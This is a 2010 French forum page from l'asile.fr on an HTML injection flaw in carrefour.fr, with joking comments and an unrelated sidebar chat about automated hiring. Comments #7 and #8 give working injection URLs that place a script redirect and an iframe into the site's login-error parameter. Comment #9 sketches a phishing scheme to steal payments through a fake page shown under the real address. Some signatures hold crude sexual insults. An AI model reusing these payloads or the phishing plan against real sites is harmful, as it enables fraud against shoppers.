l'asile.fr

5

Avec Carrefour, je positive

de SimOOn , le 30 mars 2010 à 20:51 - (carrefour.fr) - 10 commentaires
Hop, vous aussi faites de l'injection HTML excellente.

Proposer une brève

Détail des votes

Il y a 7 pour et 2 contre. Ce qui fait au total 9 votes.

À lire cette semaine...

groove_salad
#1 hOrny Lettuce

Ha ha, excellent !


"Elle a tort la petite: vu sa tronche, une sodomie à la moutarde est ce qu'elle peut espérer de mieux."
plantmann, Poète maudit.
mardi
30 mars 2010, 20:56
 
 

stillcut
#2

Ma vue baisse ?


mardi
30 mars 2010, 22:10
 
 

bloute
#3

Installe linux.


mardi
30 mars 2010, 23:51
 
 

hohun
#4 Comique tripier

Hahaha


mercredi
31 mars 2010, 01:38
 
 

groove_salad
#5 hOrny Lettuce

.


"Elle a tort la petite: vu sa tronche, une sodomie à la moutarde est ce qu'elle peut espérer de mieux."
plantmann, Poète maudit.
mercredi
31 mars 2010, 08:19
 
 

gwendal
#6 Détourageophile

Hahahaha :)


- les fautes
mercredi
31 mars 2010, 08:24
 
 

Kane
#7 Satan m'habite

Encore plus fort !

http://www.carrefour.fr/portal/site/carrefour/?loginerror=<script>windows.location.replace("www.lemonparty.org")</script>

Humf, la balise URL foire ...


mercredi
31 mars 2010, 09:24
 
 

Akshell
#8

[url]http://www.carrefour.fr/portal/site/carrefour/?loginerror=%3Ciframe%20src=%22http://www.lemonparty.org%22%20width=%22800%22%20height=%22600%22%3E%3C/iframe%3E[/url]


mercredi
31 mars 2010, 10:14
 
 

Kane
#9 Satan m'habite

haha ouai, la bonne vieille balise iframe!

Il y a moyen d'exploiter ça bien comme il faut : un bon gros SPAM avec un article en promo qui redirige vers la page en question. Sur cette page on fait afficher un faux site carrefour avec la vraie URL dans le navigateur.

Faut juste que l'utilisateur ne capte pas qu'il n'est pas en SSL au moment de payer.


mercredi
31 mars 2010, 10:38
 
 

Akshell
#10

sûrement avec un truc du genre opener.location.replace("www.lemonparty.org") dans l'iframe
j'ai pas trop envie de tester mais ça doit être possible en effet.


mercredi
31 mars 2010, 11:38
 
 


Ajouter un commentaire

Vous devez être identifié pour poster un commentaire.

# 12:38:38
(carwin) 19:18:37 Putain on vit une époque formidable
# 19:18:37
(hohun) La machine a jugé que tu ne valais rien, aucune opportunité de défendre tes compétences
# 19:17:28
(hohun) tu finis entre le désespoir et la colère, et quelque part, l'humiliation aussi
# 19:16:36
(hohun) c'est toi, tout seul devant ton PC, à parler à un mur de machines qui dans le meilleur des cas t'envoient un mail automatisé 30 secondes après ton dépot de candidature "désolé, vous ne correspondez pas"
# 19:15:03
(hohun) Des heures et des heures perdues à réecrire ton CV manuellement sur des plateformes propriétaires qui te renvoient vers d'autres plateformes propriétaires où il faut que tu réécrives ton CV aussi
# 19:14:10
(hohun) perso j'ai passé cinq mois à rechercher un taf dans un système qui est complètement automatisé, la seule personne qui produit un effort c'est toi et le RH qui reçoit éventuellement ta candidature si elle a passé l'analyse de mots clés et l'analyse de l'IA
# 19:12:16
(hohun) Je suis d'accord qu'il faudrait un entre-deux ; aucune des solutions n'est bonne, mais au moins dans celle-là il y a du lien humain...
# 17:01:36
(carwin) Pour que dalle
# 17:01:24
(carwin) si t'es pas pris(e) et retour à la case départ. Avec ta bagnole et l'essence que t'auras dépensé.
# 17:00:40
(carwin) 15:52:05 Ecoute, je sais pas. Sous couvert d'humanité et de "bienveillance", on fait subir à des chômeurs (donc des gens en galère) des petits jeux. C'est pas squid games mais la démarche est la même: infantilisation, petite humiliation au passage
lire la suite de la tribune